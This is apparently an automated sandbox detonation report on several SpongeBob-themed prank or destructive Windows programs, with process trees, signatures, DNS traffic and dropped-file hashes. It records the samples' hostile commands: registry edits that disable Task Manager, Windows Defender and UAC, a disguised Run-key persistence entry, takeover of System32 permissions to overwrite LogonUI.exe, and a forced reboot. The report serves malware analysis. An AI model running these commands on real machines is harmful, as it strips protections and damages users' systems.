PID 2504 wrote to memory of 2392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2388 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2388 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2388 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2388 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\previous versions\horrorbob.exe

"C:\Users\Admin\AppData\Local\Temp\previous versions\horrorbob.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\1A73.tmp\horrorbob.bat" "

C:\Windows\SysWOW64\cscript.exe

cscript prompt.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\System64\bg.bmp /f

C:\Windows\SysWOW64\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Kernel 64" /t REG_SZ /F /D "C:\System64\SysKern64.exe"

C:\Windows\SysWOW64\net.exe

net user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1A73.tmp\sp.vbs"

C:\Windows\SysWOW64\shutdown.exe

shutdown /r /t 00

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x0

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x1

Network

N/A

Files

memory/2132-3-0x0000000000400000-0x0000000001D7C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1A73.tmp\horrorbob.bat

MD5 fb64a183fc63eada7f48e781677907d7
SHA1 cce8bf6ef41f689ae3fe8a5ff88aa1e550adc47d
SHA256 397e6fe317d2be9d944b8df19ea005240fedfffe09bb8fbb62042fa2a5810b20
SHA512 a8c043404c62dddf21f1521c0917970e9e46d78f0c6bba6a74a7f907cf6cf27e6ed0bac831e9bb9a44d393be6c5c8a255aa0d6ac997a49a0549feb1a14bcba5a

C:\Users\Admin\AppData\Local\Temp\1A73.tmp\prompt.vbs

MD5 108887a0632fa8fcdc1ca1cc04fddb8b
SHA1 f4bc0266a7ed53b54027bc552ab64328623ab9cd
SHA256 8dce4ee27dac1fc5d3d11c160d8aa566a0f92c372dba5b0db47a8f9c3a8abb2e
SHA512 f11347bfdd7e37f379411d7bb58e07ccb7e080ba572e1e3776a3d64d620f02aa1a875db5bffc7eb7861c47ed545498bd13d1ce5e1a3e53dfb699d28a50166777

C:\Users\Admin\AppData\Local\Temp\1A73.tmp\bg.bmp

MD5 58aefe14498bee4d7034d16bf49c9044
SHA1 729064acb80656d36c590422f52463c9a2b265ef
SHA256 62154672621e164b1008a301f9655cf04c55f4ba8c74157fe9737065283da86a
SHA512 b71c4e55f248a6ef5fff58c26c5d093a5b721fed4e95c772e1cede11ec45e25839cbb091e463db4c57921ca3c1c04bb1881287f7a8610f93031ad33dce64eb85

C:\Users\Admin\AppData\Local\Temp\1A73.tmp\SysKern64.exe

MD5 4dfe61b7bd10985be30aff0bf58ae272
SHA1 67272f59d3dbfab8f2833961f352448acd9ea8ec
SHA256 13e46436cd6b276d6555c3c0499e7aaf45bd710035d8ebe83ec9f155f949e26a
SHA512 2696a2c62cda8221c1ef368af16a7196ed689cff765eaccc890a6840a39c8f8de469ca571287e92ccd93fda50860a8cdadc75660b01bdc8faa6ccaa8c9797366

C:\Users\Admin\Desktop\SPONGEBOB_IS_WATCHING_YOU_28176.txt

MD5 d036a9ad0dff58548e91a68c58ff7964
SHA1 8c6265a188fba55db49b6d744a74bbd78f562efd
SHA256 19af8f37f3b6510b8da2677b22aa43123a3898d830f643237a52346c5b3d763d
SHA512 6e93fbd051a9461a8c8eaeb30f9fdef74ca6a18bf9e60d3bd5fe702f2e9e0946059c6dc23975264f99363538e41ac0f9a1bc0dec54df5253c4919012d4065fc5

C:\Users\Admin\AppData\Local\Temp\1A73.tmp\sp.vbs

MD5 5bd73be3d9435a2ff6510c84bc643c0e
SHA1 de4ee1b6fbe2a364a1c5c2e8a69c196a370a3b4a
SHA256 9df6c43228d9fc70ef9698abd10435f2ae864a1364c6f860e822dc52487b0e46
SHA512 7c581bc3757fdd816282bd26419cb456c88792900294507701d809b8b0478b4fd5462398359a65a6f366aabdb623a1bc7caceda30111995fb4b1928841b279ac

memory/2132-133-0x0000000000400000-0x0000000001D7C000-memory.dmp

memory/1272-134-0x0000000002D90000-0x0000000002D91000-memory.dmp

memory/1400-135-0x0000000002B80000-0x0000000002B81000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:54

Platform

win10v2004-20240226-en

Max time kernel

7s

Max time network

22s

Command Line

"C:\Users\Admin\AppData\Local\Temp\previous versions\horrorbob.exe"

Signatures

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Disables Task Manager via registry modification

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\previous versions\horrorbob.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Kernel 64 = "C:\\System64\\SysKern64.exe" C:\Windows\SysWOW64\reg.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\Desktop\Wallpaper = "c:\\System64\\bg.bmp" C:\Windows\SysWOW64\reg.exe N/A

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs net.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4928 wrote to memory of 4680 N/A C:\Users\Admin\AppData\Local\Temp\previous versions\horrorbob.exe C:\Windows\SysWOW64\cmd.exe
PID 4928 wrote to memory of 4680 N/A C:\Users\Admin\AppData\Local\Temp\previous versions\horrorbob.exe C:\Windows\SysWOW64\cmd.exe
PID 4928 wrote to memory of 4680 N/A C:\Users\Admin\AppData\Local\Temp\previous versions\horrorbob.exe C:\Windows\SysWOW64\cmd.exe
PID 4680 wrote to memory of 5112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 4680 wrote to memory of 5112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 4680 wrote to memory of 5112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 4680 wrote to memory of 2268 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4680 wrote to memory of 2268 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4680 wrote to memory of 2268 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4680 wrote to memory of 3552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4680 wrote to memory of 3552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4680 wrote to memory of 3552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4680 wrote to memory of 4012 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 4680 wrote to memory of 4012 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 4680 wrote to memory of 4012 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 4680 wrote to memory of 3928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4680 wrote to memory of 3928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4680 wrote to memory of 3928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4680 wrote to memory of 4140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4680 wrote to memory of 4140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4680 wrote to memory of 4140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4680 wrote to memory of 4532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4680 wrote to memory of 4532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4680 wrote to memory of 4532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4680 wrote to memory of 3792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4680 wrote to memory of 3792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4680 wrote to memory of 3792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4680 wrote to memory of 3508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 4680 wrote to memory of 3508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 4680 wrote to memory of 3508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 3508 wrote to memory of 644 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3508 wrote to memory of 644 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3508 wrote to memory of 644 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe

Processes

C:\Users\Admin\AppData\Local\Temp\previous versions\horrorbob.exe

"C:\Users\Admin\AppData\Local\Temp\previous versions\horrorbob.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5AB3.tmp\horrorbob.bat" "

C:\Windows\SysWOW64\cscript.exe

cscript prompt.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\System64\bg.bmp /f

C:\Windows\SysWOW64\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Kernel 64" /t REG_SZ /F /D "C:\System64\SysKern64.exe"

C:\Windows\SysWOW64\net.exe

net user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5AB3.tmp\sp.vbs"

C:\Windows\SysWOW64\shutdown.exe

shutdown /r /t 00

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x4 /state0:0xa394e055 /state1:0x41c64e6d

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp

Files

memory/4928-0-0x0000000000400000-0x0000000001D7C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5AB3.tmp\horrorbob.bat

MD5 fb64a183fc63eada7f48e781677907d7
SHA1 cce8bf6ef41f689ae3fe8a5ff88aa1e550adc47d
SHA256 397e6fe317d2be9d944b8df19ea005240fedfffe09bb8fbb62042fa2a5810b20
SHA512 a8c043404c62dddf21f1521c0917970e9e46d78f0c6bba6a74a7f907cf6cf27e6ed0bac831e9bb9a44d393be6c5c8a255aa0d6ac997a49a0549feb1a14bcba5a

C:\Users\Admin\AppData\Local\Temp\5AB3.tmp\prompt.vbs

MD5 108887a0632fa8fcdc1ca1cc04fddb8b
SHA1 f4bc0266a7ed53b54027bc552ab64328623ab9cd
SHA256 8dce4ee27dac1fc5d3d11c160d8aa566a0f92c372dba5b0db47a8f9c3a8abb2e
SHA512 f11347bfdd7e37f379411d7bb58e07ccb7e080ba572e1e3776a3d64d620f02aa1a875db5bffc7eb7861c47ed545498bd13d1ce5e1a3e53dfb699d28a50166777

C:\Users\Admin\AppData\Local\Temp\5AB3.tmp\bg.bmp

MD5 56fd86679ff0b8c3b4e7851c51c78351
SHA1 8e5ae5b7167933e88840dcd06c8fca5d12a59525
SHA256 abcd305f275345b6f8f3896bc1a2e46e039e4fb7c5e820e63b1dc4b4c400a095
SHA512 d0b150488a7a7cf687c73bf16277b073858bf6391c1958a2fccf10343b2fe5ec4c3bb8627e66c7fbf7f3fbaa8a8abfe5a9cb27c412873da604d2e6721d184c97

C:\Users\Admin\AppData\Local\Temp\5AB3.tmp\SysKern64.exe

MD5 382c03015ef6a00c840998c6196b686e
SHA1 9f008126293c66c43a421b572e877ad62caeda45
SHA256 d7ec176b21ffe803b880611f75d7275bba6c4b042dc6e864245ebd4c85699735
SHA512 e01435eafb51a4c1ebe853e1494d14cccf18f617e675ea442c02b281de986cb3dcd1425c9c9fddeaaf6838f81787577cad047df03f4cb9fb67db33d560b2eeb4

C:\Users\Admin\Desktop\SPONGEBOB_IS_WATCHING_YOU_16037.txt

MD5 d036a9ad0dff58548e91a68c58ff7964
SHA1 8c6265a188fba55db49b6d744a74bbd78f562efd
SHA256 19af8f37f3b6510b8da2677b22aa43123a3898d830f643237a52346c5b3d763d
SHA512 6e93fbd051a9461a8c8eaeb30f9fdef74ca6a18bf9e60d3bd5fe702f2e9e0946059c6dc23975264f99363538e41ac0f9a1bc0dec54df5253c4919012d4065fc5

C:\Users\Admin\AppData\Local\Temp\5AB3.tmp\sp.vbs

MD5 5bd73be3d9435a2ff6510c84bc643c0e
SHA1 de4ee1b6fbe2a364a1c5c2e8a69c196a370a3b4a
SHA256 9df6c43228d9fc70ef9698abd10435f2ae864a1364c6f860e822dc52487b0e46
SHA512 7c581bc3757fdd816282bd26419cb456c88792900294507701d809b8b0478b4fd5462398359a65a6f366aabdb623a1bc7caceda30111995fb4b1928841b279ac

memory/4928-93-0x0000000000400000-0x0000000001D7C000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win7-20240221-en

Max time kernel

122s

Max time network

128s

Command Line

"C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Resources\LogonUI.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Resources\LogonUI.exe

"C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Resources\LogonUI.exe"

Network

N/A

Files

memory/2204-0-0x0000000000900000-0x000000000090A000-memory.dmp

memory/2204-1-0x000007FEF58A0000-0x000007FEF628C000-memory.dmp

memory/2204-2-0x000000001B3B0000-0x000000001B430000-memory.dmp

memory/2204-3-0x000007FEF58A0000-0x000007FEF628C000-memory.dmp

memory/2204-4-0x000000001B3B0000-0x000000001B430000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win10v2004-20240226-en

Max time kernel

142s

Max time network

135s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep.exe"

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2308 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep.exe C:\Windows\SysWOW64\cmd.exe
PID 2308 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep.exe C:\Windows\SysWOW64\cmd.exe
PID 2308 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep.exe

"C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8136.tmp\SpongebobNoSleep.cmd""

Network

Country Destination Domain Proto
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
GB 92.123.241.137:80 www.microsoft.com tcp
GB 92.123.241.137:80 www.microsoft.com tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 137.241.123.92.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

memory/2308-0-0x0000000000400000-0x000000000079B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8136.tmp\SpongebobNoSleep.cmd

MD5 f0f8f16b1be67c7ce5d854701fae56ce
SHA1 9ef78e1bec7b3f7190231d7d1179629db0756a38
SHA256 71f31c42e96e8dd9c25b2d36959d2ee75948a10aaeae25dffc2dd03759e53f83
SHA512 ef514835e6b4ead1c649846082beed6182947e0cd90538dea6ad8290c177c657e6f9c2e4d9f473de300fb10fb1f74e691911d75239dbf926ad5cf46b7370fd0e

memory/2308-12-0x0000000000400000-0x000000000079B000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win10v2004-20231215-en

Max time kernel

90s

Max time network

124s

Command Line

"C:\Windows\hh.exe" "C:\Users\Admin\AppData\Local\Temp\source\Bat To Exe Converter\help.chm"

Signatures

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\hh.exe N/A
N/A N/A C:\Windows\hh.exe N/A

Processes

C:\Windows\hh.exe

"C:\Windows\hh.exe" "C:\Users\Admin\AppData\Local\Temp\source\Bat To Exe Converter\help.chm"

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 81.171.91.138.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win7-20240221-en

Max time kernel

122s

Max time network

127s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Form1.js

Signatures

N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Form1.js

Network

N/A

Files

N/A

Analysis: behavioral28

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win10v2004-20240226-en

Max time kernel

148s

Max time network

158s

Command Line

"C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\bin\Debug\Logon_overwriter.exe"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\bin\Debug\Logon_overwriter.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\LogonUI.exe C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\bin\Debug\Logon_overwriter.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\bin\Debug\Logon_overwriter.exe

"C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\bin\Debug\Logon_overwriter.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32 /grant "Admin:F"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 104.241.123.92.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 211.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 176.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 174.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

memory/4872-0-0x0000000000790000-0x000000000079E000-memory.dmp

memory/4872-2-0x000000001B290000-0x000000001B2A0000-memory.dmp

memory/4872-1-0x00007FFE8CE20000-0x00007FFE8D8E1000-memory.dmp

memory/4872-5-0x00007FFE8CE20000-0x00007FFE8D8E1000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win7-20240221-en

Max time kernel

141s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep.exe"

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep.exe

"C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\711B.tmp\SpongebobNoSleep.cmd""

Network

N/A

Files

memory/3048-0-0x0000000000400000-0x000000000079B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\711B.tmp\SpongebobNoSleep.cmd

MD5 f0f8f16b1be67c7ce5d854701fae56ce
SHA1 9ef78e1bec7b3f7190231d7d1179629db0756a38
SHA256 71f31c42e96e8dd9c25b2d36959d2ee75948a10aaeae25dffc2dd03759e53f83
SHA512 ef514835e6b4ead1c649846082beed6182947e0cd90538dea6ad8290c177c657e6f9c2e4d9f473de300fb10fb1f74e691911d75239dbf926ad5cf46b7370fd0e

memory/3048-17-0x0000000000400000-0x000000000079B000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win10v2004-20240226-en

Max time kernel

141s

Max time network

135s

Command Line

"C:\Users\Admin\AppData\Local\Temp\previous versions\SpongebobFuck.exe"

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\previous versions\SpongebobFuck.exe

"C:\Users\Admin\AppData\Local\Temp\previous versions\SpongebobFuck.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\44D9.tmp\SpongebobFuck.cmd""

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
